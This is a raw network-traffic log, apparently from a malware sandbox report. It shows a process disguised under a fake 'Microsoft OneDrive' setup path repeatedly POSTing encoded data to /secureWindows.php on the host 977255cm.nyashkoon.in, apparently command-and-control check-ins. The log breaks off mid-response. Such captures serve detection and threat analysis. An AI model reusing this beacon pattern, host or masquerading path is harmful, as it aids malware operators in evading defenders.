                                                        Oct 30, 2024 05:22:54.902040958 CET1072OUTData Raw: 52 53 5c 51 50 5a 56 53 58 57 50 59 55 58 5b 53 54 5e 5c 5f 59 54 5a 58 5d 59 58 5e 53 5e 55 52 43 45 52 52 50 57 52 5d 5d 57 53 5a 52 59 50 42 5a 5c 5d 5b 5f 57 51 53 55 52 5b 5d 57 59 59 5b 5e 51 58 5e 54 58 55 54 59 56 5e 5a 5a 50 59 56 54 58
                                                        Data Ascii: RS\QPZVSXWPYUX[ST^\_YTZX]YX^S^URCERRPWR]]WSZRYPBZ\][_WQSUR[]WYY[^QX^TXUTYV^ZZPYVTXTWV@TYSWVTFZ[T[_XQX^YY[]Z\]T\\^]Y^_[Q[VX[R[TB_ZUU^^__YBQYT^DXTT\\\V_^]_WZQ[@UTZZTTSRUV]\RYX_T_[_\^\Q_R%/"=8!$=,5$-+/: 7*$%?_'5[: F$,Z*


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        56192.168.2.449793188.114.96.3807760C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe
                                                        TimestampBytes transferredDirectionData
                                                        Oct 30, 2024 05:22:55.144041061 CET310OUTPOST /secureWindows.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                        Host: 977255cm.nyashkoon.in
                                                        Content-Length: 1312
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Oct 30, 2024 05:22:55.495832920 CET1312OUTData Raw: 57 52 59 57 50 59 53 57 58 57 50 59 55 5f 5b 53 54 58 5c 5b 59 52 5a 55 5d 59 58 5e 53 5e 55 52 43 45 52 52 50 57 52 5d 5d 57 53 5a 52 59 50 42 5a 5c 5d 5b 5f 57 51 53 55 52 5b 5d 57 59 59 5b 5e 51 58 5e 54 58 55 54 59 56 5e 5a 5a 50 59 56 54 58
                                                        Data Ascii: WRYWPYSWXWPYU_[STX\[YRZU]YX^S^URCERRPWR]]WSZRYPBZ\][_WQSUR[]WYY[^QX^TXUTYV^ZZPYVTXTWV@TYSWVTFZ[T[_XQX^YY[]Z\]T\\^]Y^_[Q[VX[R[TB_ZUU^^__YBQYT^DXTT\\\V_^]_WZQ[@UTZZTTSRUV]\RYX_T_[_\^\Q_R&-#%<($'D:<^%[0,*8Z :+&)X?9Z'(-- F$,Z*
                                                        Oct 30, 2024 05:22:56.670042992 CET25INHTTP/1.1 100 Continue
                                                        Oct 30, 2024 05:22:56.671462059 CET25INHTTP/1.1 100 Continue
                                                        Oct 30, 2024 05:22:56.671478033 CET936INHTTP/1.1 200 OK
                                                        Date: Wed, 30 Oct 2024 04:22:55 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5KObgl4QmbroCbH7%2F0%2BhEhNL8VcZkX1Ej35GYFt9MroXVT0ZyWY4jroWMfxEwd0YwoxiBfVRAiKCvTNX56sXKbCBfoxtGEPwnPf%2B2I8cT8m9RiYotfAKWP4%2Fg1eyqI3pdW9dvJSAPPw%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 8da8a0860842477f-DFW
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1695&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1622&delivery_rate=912413&cwnd=241&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                        Data Raw: 39 38 0d 0a 01 1f 26 57 28 16 2c 50 24 33 32 1e 3c 2f 25 5e 28 3d 36 5c 33 31 20 5c 26 02 0c 5e 3c 05 23 58 29 0a 05 00 3c 22 30 10 21 26 2c 5e 29 3b 2f 46 0c 10 24 07 27 32 23 1e 3f 55 3d 59 29 28 24 04 34 30 39 04 2a 5f 37 1d 21 0d 06 1d 30 31 0c 54 38 03 2a 1e 2d 36 32 58 2e 20 2f 0b 3e 3a 21 57 08 14 22 58 25 2f 23 1b 31 03 02 5e 25 0c 08 5b 23 01 09 10 36 2b 2a 5b 3c 3b 34 11 32 0e 20 5e 24 33 27 1c 32 29 3b 06 3c 1f 30 0d 27 33 22 52 2e 0d 20 56 03 32 58 53 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 98&W(,P$32</%^(=6\31 \&^<#X)<"0!&,^);/F$'2#?U=Y)($409*_7!01T8*-62X. />:!W"X%/#1^%[#6+*[<;42 ^$3'2);<0'3"R. V2XS0
                                                        Oct 30, 2024 05:22:56.672540903 CET25INHTTP/1.1 100 Continue
                                                        Oct 30, 2024 05:22:56.674607038 CET25INHTTP/1.1 100 Continue
                                                        Oct 30, 2024 05:22:56.677349091 CET936INHTTP/1.1 200 OK
                                                        Date: Wed, 30 Oct 2024 04:22:55 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5KObgl4QmbroCbH7%2F0%2BhEhNL8VcZkX1Ej35GYFt9MroXVT0ZyWY4jroWMfxEwd0YwoxiBfVRAiKCvTNX56sXKbCBfoxtGEPwnPf%2B2I8cT8m9RiYotfAKWP4%2Fg1eyqI3pdW9dvJSAPPw%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 8da8a0860842477f-DFW
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1695&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1622&delivery_rate=912413&cwnd=241&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                        Data Raw: 39 38 0d 0a 01 1f 26 57 28 16 2c 50 24 33 32 1e 3c 2f 25 5e 28 3d 36 5c 33 31 20 5c 26 02 0c 5e 3c 05 23 58 29 0a 05 00 3c 22 30 10 21 26 2c 5e 29 3b 2f 46 0c 10 24 07 27 32 23 1e 3f 55 3d 59 29 28 24 04 34 30 39 04 2a 5f 37 1d 21 0d 06 1d 30 31 0c 54 38 03 2a 1e 2d 36 32 58 2e 20 2f 0b 3e 3a 21 57 08 14 22 58 25 2f 23 1b 31 03 02 5e 25 0c 08 5b 23 01 09 10 36 2b 2a 5b 3c 3b 34 11 32 0e 20 5e 24 33 27 1c 32 29 3b 06 3c 1f 30 0d 27 33 22 52 2e 0d 20 56 03 32 58 53 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 98&W(,P$32</%^(=6\31 \&^<#X)<"0!&,^);/F$'2#?U=Y)($409*_7!01T8*-62X. />:!W"X%/#1^%[#6+*[<;42 ^$3'2);<0'3"R. V2XS0


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        57192.168.2.449794188.114.96.3807760C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe
                                                        TimestampBytes transferredDirectionData
                                                        Oct 30, 2024 05:22:55.263490915 CET310OUTPOST /secureWindows.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                        Host: 977255cm.nyashkoon.in
                                                        Content-Length: 1072
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Oct 30, 2024 05:22:55.620784044 CET1072OUTData Raw: 57 5e 59 50 55 5a 56 50 58 57 50 59 55 58 5b 5c 54 5e 5c 5d 59 53 5a 5f 5d 59 58 5e 53 5e 55 52 43 45 52 52 50 57 52 5d 5d 57 53 5a 52 59 50 42 5a 5c 5d 5b 5f 57 51 53 55 52 5b 5d 57 59 59 5b 5e 51 58 5e 54 58 55 54 59 56 5e 5a 5a 50 59 56 54 58
                                                        Data Ascii: W^YPUZVPXWPYUX[\T^\]YSZ_]YX^S^URCERRPWR]]WSZRYPBZ\][_WQSUR[]WYY[^QX^TXUTYV^ZZPYVTXTWV@TYSWVTFZ[T[_XQX^YY[]Z\]T\\^]Y^_[Q[VX[R[TB_ZUU^^__YBQYT^DXTT\\\V_^]_WZQ[@UTZZTTSRUV]\RYX_T_[_\^\Q_R%]/?+%$.(:4$=_,:+ *\&*++%3!.* F$,Z*=
                                                        Oct 30, 2024 05:22:56.670828104 CET25INHTTP/1.1 100 Continue
                                                        Oct 30, 2024 05:22:56.671922922 CET25INHTTP/1.1 100 Continue
                                                        Oct 30, 2024 05:22:56.672435045 CET786INHTTP/1.1 200 OK
                                                        Date: Wed, 30 Oct 2024 04:22:56 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=NAbuUgPOV135KbHM%2FtkSXkRZhvYIuWOOPNokOaU8Q7cOWxXKBtHJkshxq%2FfsU2bTd7ol2sK7iwtOK3IRVibpITWxHVldrMuEhMRfQEXMLu6oBNInNH2KfmkFwFEae7Vfrs%2Bb7zIn67k%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 8da8a086cde64786-DFW
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1119&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1382&delivery_rate=1371212&cwnd=233&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                        Data Raw: 34 0d 0a 33 57 5f 59 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 43W_Y0
                                                        Oct 30, 2024 05:22:56.673002958 CET25INHTTP/1.1 100 Continue
                                                        Oct 30, 2024 05:22:56.677398920 CET786INHTTP/1.1 200 OK
                                                        Date: Wed, 30 Oct 2024 04:22:56 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=NAbuUgPOV135KbHM%2FtkSXkRZhvYIuWOOPNokOaU8Q7cOWxXKBtHJkshxq%2FfsU2bTd7ol2sK7iwtOK3IRVibpITWxHVldrMuEhMRfQEXMLu6oBNInNH2KfmkFwFEae7Vfrs%2Bb7zIn67k%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 8da8a086cde64786-DFW
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1119&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1382&delivery_rate=1371212&cwnd=233&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                        Data Raw: 34 0d 0a 33 57 5f 59 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 43W_Y0


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        58192.168.2.449796188.114.96.3807760C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe
                                                        TimestampBytes transferredDirectionData
                                                        Oct 30, 2024 05:22:56.796577930 CET286OUTPOST /secureWindows.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                        Host: 977255cm.nyashkoon.in
                                                        Content-Length: 1076
                                                        Expect: 100-continue
                                                        Oct 30, 2024 05:22:57.152132034 CET1076OUTData Raw: 57 51 5c 51 55 59 53 51 58 57 50 59 55 5b 5b 5e 54 59 5c 58 59 51 5a 54 5d 59 58 5e 53 5e 55 52 43 45 52 52 50 57 52 5d 5d 57 53 5a 52 59 50 42 5a 5c 5d 5b 5f 57 51 53 55 52 5b 5d 57 59 59 5b 5e 51 58 5e 54 58 55 54 59 56 5e 5a 5a 50 59 56 54 58
                                                        Data Ascii: WQ\QUYSQXWPYU[[^TY\XYQZT]YX^S^URCERRPWR]]WSZRYPBZ\][_WQSUR[]WYY[^QX^TXUTYV^ZZPYVTXTWV@TYSWVTFZ[T[_XQX^YY[]Z\]T\\^]Y^_[Q[VX[R[TB_ZUU^^__YBQYT^DXTT\\\V_^]_WZQ[@UTZZTTSRUV]\RYX_T_[_\^\Q_R%Z/Y?+1$=D:4%=?/*$Z"*X%9$<5)Z0)9 F$,Z*)
                                                        Oct 30, 2024 05:22:57.403933048 CET25INHTTP/1.1 100 Continue
                                                        Oct 30, 2024 05:22:57.615575075 CET786INHTTP/1.1 200 OK
                                                        Date: Wed, 30 Oct 2024 04:22:57 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=nvrA8R3ZrliE9idusfabyDzgXdMYqez%2F5sAuvgsxY4S3fi%2FV0fE4hDwkBHUh9Angm67iH4P2Sej%2BbIqsF75ma8FpdSExblWtl8DjvqtyaPNqSVtCN2JHbBdckUqQN9SFazfJkdxrppU%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 8da8a0906bb03165-DFW
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1169&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1362&delivery_rate=1261324&cwnd=243&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                        Data Raw: 34 0d 0a 33 57 5f 59 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 43W_Y0


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        59192.168.2.449797188.114.96.3807760C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe
                                                        TimestampBytes transferredDirectionData
                                                        Oct 30, 2024 05:22:57.746654987 CET310OUTPOST /secureWindows.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                        Host: 977255cm.nyashkoon.in
                                                        Content-Length: 1076
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Oct 30, 2024 05:22:58.105290890 CET1076OUTData Raw: 52 52 5c 50 55 55 56 55 58 57 50 59 55 5f 5b 53 54 53 5c 5d 59 53 5a 59 5d 59 58 5e 53 5e 55 52 43 45 52 52 50 57 52 5d 5d 57 53 5a 52 59 50 42 5a 5c 5d 5b 5f 57 51 53 55 52 5b 5d 57 59 59 5b 5e 51 58 5e 54 58 55 54 59 56 5e 5a 5a 50 59 56 54 58
                                                        Data Ascii: RR\PUUVUXWPYU_[STS\]YSZY]YX^S^URCERRPWR]]WSZRYPBZ\][_WQSUR[]WYY[^QX^TXUTYV^ZZPYVTXTWV@TYSWVTFZ[T[_XQX^YY[]Z\]T\\^]Y^_[Q[VX[R[TB_ZUU^^__YBQYT^DXTT\\\V_^]_WZQ[@UTZZTTSRUV]\RYX_T_[_\^\Q_R%Z8#.]=8X$B:C0\&,8#49(&_#+"3(%- F$,Z*
                                                        Oct 30, 2024 05:22:58.341034889 CET25INHTTP/1.1 100 Continue
                                                        Oct 30, 2024 05:22:58.538539886 CET796INHTTP/1.1 200 OK
                                                        Date: Wed, 30 Oct 2024 04:22:58 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=PhAa7sVpkct9rafWJUjsFWmRqRaMGKx1ZPBtvoUvm79LtOJOD%2Bq9lWCAjF%2Bb6qCXJcqMvqvF%2FzteJ6uu7CM%2FDQzoVAtdpF2LV7diGCPpFWm%2BSYrIPXz98%2FCIG86E2tKgYa%2F4Azvz%2BrA%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 8da8a0964be03064-DFW
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1397&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1386&delivery_rate=1048515&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                        Data Raw: 34 0d 0a 33 57 5f 59 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 43W_Y0


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        60192.168.2.449798188.114.96.3807760C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe
                                                        TimestampBytes transferredDirectionData
                                                        Oct 30, 2024 05:22:58.670756102 CET310OUTPOST /secureWindows.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                        Host: 977255cm.nyashkoon.in
                                                        Content-Length: 1076
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Oct 30, 2024 05:22:59.027770996 CET1076OUTData Raw: 57 5f 59 57 50 5a 53 50 58 57 50 59 55 59 5b 58 54 5c 5c 5c 59 53 5a 5e 5d 59 58 5e 53 5e 55 52 43 45 52 52 50 57 52 5d 5d 57 53 5a 52 59 50 42 5a 5c 5d 5b 5f 57 51 53 55 52 5b 5d 57 59 59 5b 5e 51 58 5e 54 58 55 54 59 56 5e 5a 5a 50 59 56 54 58
                                                        Data Ascii: W_YWPZSPXWPYUY[XT\\\YSZ^]YX^S^URCERRPWR]]WSZRYPBZ\][_WQSUR[]WYY[^QX^TXUTYV^ZZPYVTXTWV@TYSWVTFZ[T[_XQX^YY[]Z\]T\\^]Y^_[Q[VX[R[TB_ZUU^^__YBQYT^DXTT\\\V_^]_WZQ[@UTZZTTSRUV]\RYX_T_[_\^\Q_R%/?(:'>+B:%$]1?,, )41?%'"-* F$,Z*!
                                                        Oct 30, 2024 05:22:59.258132935 CET25INHTTP/1.1 100 Continue
                                                        Oct 30, 2024 05:22:59.447565079 CET798INHTTP/1.1 200 OK
                                                        Date: Wed, 30 Oct 2024 04:22:59 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8EYsPPdEC99Z%2BqNycy2QJ%2FAgaK8SkDkDvcS%2B39FVWIpjiPE%2B%2FzMMZ3B%2BCXPOKu44FyorwBFUVYM%2BuZ%2B3PbjkdMkc8T8exw1ltX6%2FXhBRGvhOxPyiljmCp4ZcV9fRuLWNh1eiKhdzYOw%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 8da8a09c0cdb2836-DFW
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1333&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1386&delivery_rate=1026222&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                        Data Raw: 34 0d 0a 33 57 5f 59 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 43W_Y0


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        61192.168.2.449804188.114.96.3807760C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe
                                                        TimestampBytes transferredDirectionData
                                                        Oct 30, 2024 05:22:59.575903893 CET310OUTPOST /secureWindows.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                        Host: 977255cm.nyashkoon.in
                                                        Content-Length: 1076
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Oct 30, 2024 05:22:59.933326006 CET1076OUTData Raw: 52 55 59 50 55 55 56 57 58 57 50 59 55 5f 5b 5e 54 5a 5c 5c 59 50 5a 54 5d 59 58 5e 53 5e 55 52 43 45 52 52 50 57 52 5d 5d 57 53 5a 52 59 50 42 5a 5c 5d 5b 5f 57 51 53 55 52 5b 5d 57 59 59 5b 5e 51 58 5e 54 58 55 54 59 56 5e 5a 5a 50 59 56 54 58
                                                        Data Ascii: RUYPUUVWXWPYU_[^TZ\\YPZT]YX^S^URCERRPWR]]WSZRYPBZ\][_WQSUR[]WYY[^QX^TXUTYV^ZZPYVTXTWV@TYSWVTFZ[T[_XQX^YY[]Z\]T\\^]Y^_[Q[VX[R[TB_ZUU^^__YBQYT^DXTT\\\V_^]_WZQ[@UTZZTTSRUV]\RYX_T_[_\^\Q_R%\8%?8>['<.3%>/,*<Y4?&94?%6$+6- F$,Z*
                                                        Oct 30, 2024 05:23:00.170702934 CET25INHTTP/1.1 100 Continue
                                                        Oct 30, 2024 05:23:00.531229019 CET786INHTTP/1.1 200 OK
                                                        Date: Wed, 30 Oct 2024 04:23:00 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lK4Pkz3O9v0iBCXTtzsmVcrCsz5rZ0r2NnSuIH3Ah2h5JGlMth1h3o0ZcFDeLqmQ%2F4HeNasUGE%2BgF659qTZn8PpUiQH6sZ4LLQ7xQDl4rWqzAPJZaqsB2OgNk9b7F%2BAqa1p3u0hRPDM%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 8da8a0a1b84f2cda-DFW
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1380&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1386&delivery_rate=1071005&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                        Data Raw: 34 0d 0a 33 57 5f 59 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 43W_Y0


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        62192.168.2.449810188.114.96.3807760C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe
                                                        TimestampBytes transferredDirectionData
                                                        Oct 30, 2024 05:23:00.653740883 CET310OUTPOST /secureWindows.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                        Host: 977255cm.nyashkoon.in
                                                        Content-Length: 1076
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Oct 30, 2024 05:23:01.012856960 CET1076OUTData Raw: 57 5f 5c 54 50 5d 56 54 58 57 50 59 55 5f 5b 53 54 5b 5c 5d 59 56 5a 5f 5d 59 58 5e 53 5e 55 52 43 45 52 52 50 57 52 5d 5d 57 53 5a 52 59 50 42 5a 5c 5d 5b 5f 57 51 53 55 52 5b 5d 57 59 59 5b 5e 51 58 5e 54 58 55 54 59 56 5e 5a 5a 50 59 56 54 58
                                                        Data Ascii: W_\TP]VTXWPYU_[ST[\]YVZ_]YX^S^URCERRPWR]]WSZRYPBZ\][_WQSUR[]WYY[^QX^TXUTYV^ZZPYVTXTWV@TYSWVTFZ[T[_XQX^YY[]Z\]T\\^]Y^_[Q[VX[R[TB_ZUU^^__YBQYT^DXTT\\\V_^]_WZQ[@UTZZTTSRUV]\RYX_T_[_\^\Q_R%Z,9?(.$.5 Z&=,$ '9']($5[. F$,Z*
                                                        Oct 30, 2024 05:23:01.260462999 CET25INHTTP/1.1 100 Continue
                                                        Oct 30, 2024 05:23:01.569513083 CET796INHTTP/1.1 200 OK
                                                        Date: Wed, 30 Oct 2024 04:23:01 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jeupsWXug56Jl29anCGvK2u%2ByTjdTVW0Fs7r8f14MoGBMmLvQT6OO%2B%2Bwg3j5SQ3cD%2FyqOTnhd8OlfqsJl4%2FCS8eOtVm99%2BDqdSnczqHvy3YmOoQC3O%2Fb4xXXaRMDkU%2F1FALy2PAg1P0%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 8da8a0a88c792ca4-DFW
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1297&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1386&delivery_rate=1119010&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                        Data Raw: 34 0d 0a 33 57 5f 59 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 43W_Y0


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        63192.168.2.449818188.114.96.3807760C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe
                                                        TimestampBytes transferredDirectionData
                                                        Oct 30, 2024 05:23:01.692276001 CET310OUTPOST /secureWindows.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                        Host: 977255cm.nyashkoon.in
                                                        Content-Length: 1340
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        64192.168.2.449820188.114.96.3807760C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe
                                                        TimestampBytes transferredDirectionData
                                                        Oct 30, 2024 05:23:01.702904940 CET310OUTPOST /secureWindows.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                        Host: 977255cm.nyashkoon.in
                                                        Content-Length: 1076
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Oct 30, 2024 05:23:02.058355093 CET1076OUTData Raw: 57 51 5c 55 55 5f 53 52 58 57 50 59 55 5c 5b 5c 54 58 5c 54 59 5c 5a 5f 5d 59 58 5e 53 5e 55 52 43 45 52 52 50 57 52 5d 5d 57 53 5a 52 59 50 42 5a 5c 5d 5b 5f 57 51 53 55 52 5b 5d 57 59 59 5b 5e 51 58 5e 54 58 55 54 59 56 5e 5a 5a 50 59 56 54 58
                                                        Data Ascii: WQ\UU_SRXWPYU\[\TX\TY\Z_]YX^S^URCERRPWR]]WSZRYPBZ\][_WQSUR[]WYY[^QX^TXUTYV^ZZPYVTXTWV@TYSWVTFZ[T[_XQX^YY[]Z\]T\\^]Y^_[Q[VX[R[TB_ZUU^^__YBQYT^DXTT\\\V_^]_WZQ[@UTZZTTSRUV]\RYX_T_[_\^\Q_R%\80%+*X':(_&><Z;\8]"*+')+\(%13+9. F$,Z*5
                                                        Oct 30, 2024 05:23:02.297053099 CET25INHTTP/1.1 100 Continue
                                                        Oct 30, 2024 05:23:02.602619886 CET783INHTTP/1.1 200 OK
                                                        Date: Wed, 30 Oct 2024 04:23:02 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=yzc5ZExdv6TBubHTaXSRSiY7zEv4B9FFdjUZ6pgLKs3oVXiCiVAynwoO569ukyLthCjrV6tw%2B1rwzhdKdx16UzBiwD3HXSf2tYONQuzKc9UCwO7QoiMJNaVCZdRNDDO%2FqWHJZPk3NJk%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
